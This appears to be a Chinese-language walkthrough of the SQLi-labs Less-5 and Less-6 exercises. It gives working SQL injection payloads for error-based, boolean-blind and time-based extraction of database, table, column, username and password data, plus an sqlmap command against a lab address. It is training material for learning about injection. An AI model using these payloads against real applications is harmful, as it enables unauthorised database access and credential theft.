Less-5

\

near ''1\' LIMIT 0,1' at line 1

' 闭合

' --+ 成功              但是一直显示 you are in.....

看到这个报错信息，第一反应就是布尔型盲注、报错注入、时间盲注

方法一  报错注入

（1）.使用报错函数  extractvalue  updatexml 

id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+

id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),1) --+

（2）使用concat聚合函数        随机成功

简单的说，使用聚合函数进行双注入查询时，会在错误信息中显示一部分错误信息。

比如count函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来。

查询数据库版本在phpmyadmin中测试：

select count(*), concat(0x7e,(select version()),0x3a, floor(rand()*2))a from information_schema.tables group by a;

显示  #1062 - Duplicate entry '~5.5.53:0' for key 'group_key'

爆库名

id=2' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b) --+

//或者

id=-1'union select count(*),count(*), concat('~',(select database()),'~',floor(rand()*2))a from information_schema.tables group by a--+

//或者

id=-1'union select count(*),1, concat('~',(select database()),'~',floor(rand()*2))a from information_schema.tables group by a--+

Duplicate entry '::security::0' for key 'group_key'

爆表名

id=2' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b) --+

//或者

id=-1' union select count(*),1, concat('~',(select concat(table_name) from information_schema.tables where table_schema=database() limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+

Duplicate entry '::emails::1' for key 'group_key'

爆列名

id=2' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b) --+

//或者

id=-1' union select count(*),1, concat('~',(select column_name from information_schema.columns where table_name='users' limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+

修改limit x,1 可以遍历列名，

Duplicate entry '~referers~1' for key 'group_key'

爆字段

用户名

id=2' AND

(select 1 from

(select count(*),concat(0x3a,0x3a,(select username from users limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)

b) --+

密码

id=2' AND

(select 1 from

(select count(*),concat(0x3a,0x3a,(select password from users limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)

b) --+

//或者

id=-1' union select count(*),1, concat('~',(select concat_ws(':',username,password) from users limit 0,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+

​修改limit x,1 可以显示第x个用户的username，password 

SELECT CONCAT_WS('_',id,name) AS con_ws FROM info LIMIT 1;返回结果为

+----------+

| con_ws  |

+----------+

| 1_BioCyc |

+----------+

Duplicate entry '::Dumb::1' for key 'group_key'

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

方法二 布尔型手工注入                    

时间延迟注入的简化    left( , )=' '    注意left(,x) x大点没关系 照样正确，如爆列名的2，3语句

布尔型注入中，正确会回显，错误没有回显，以此为依据逐字爆破，注意id=1

正确的话显示 You are in...........

手工注入时可使用例如left((select database()),1)<'h'  这样的比较二分查找方法快速爆破。 

判断数据库长度，判断数据库名

判断表名个数，长度，表名

判断列的个数，长度，列名

判断字段的个数，长度，值

爆库

id=1' and left((select database()),1)='s'      --+

id=1' and left((select database()),2)='se'  --+

爆表

id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e' --+

id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 0,1),6)='emails' --+

id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users' --+

修改limit x,1和left中的位数限定数字，爆破到第一张表为emails，终于在第三张表爆破到user表，名为users。

爆列名

id=1' and left((select column_name from information_schema.columns where table_name='users' limit 0,1),2)='id' --+

id=1' and left((select column_name from information_schema.columns where table_name='users' limit 2,1),8)='password' --+

id=1' and left((select column_name from information_schema.columns where table_name='users' limit 2,1),9)='password' --+

爆字段

用户名

id=1' and left((select username from users order by id limit 0,1),1)='d' --+

密码

id=1' and left((select password from users order by id limit 0,1),1)='d' --+

注意的是，mysql对大小写不敏感。

===============================================================================================

方法三：时间延迟型手工注入：                if(left( , )=' ',sleep(5),1)

IF(expr1,expr2,expr3)

如果 expr1 是TRUE (expr1 <> 0 and expr1 <> NULL)，则 IF()的返回值为expr2; 否则返回值则为 expr3。

id=1' and sleep(10) --+

爆库长

id=1' and if(length(database())=8,sleep(5),1)--+

爆库名

id=1' and if(left(database(),1)='s',sleep(5),1)--+

id=1' and if(left(database(),2)='se',sleep(5),1)--+

爆表名

id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e' ,sleep(5),1)--+

id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),2)='em' ,sleep(5),1)--+

爆列名

id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 0,1),8)='id' ,sleep(5),1)--+

爆破值

id=1' and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+

id=1' and if(left((select password from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+

================================================================================================

方法四  sqlmap

sqlmap -u "http://192.168.26.148/sql/Less-5/?id=1" --current-db --batch

Less-6  同 Less-5

Less-6

id=2\ 

near '"1\" LIMIT 0,1' at line 1

"  闭合

Less-5的单引号改成双引号就可以了

报错注入

时间盲注

布尔盲注

sqlmap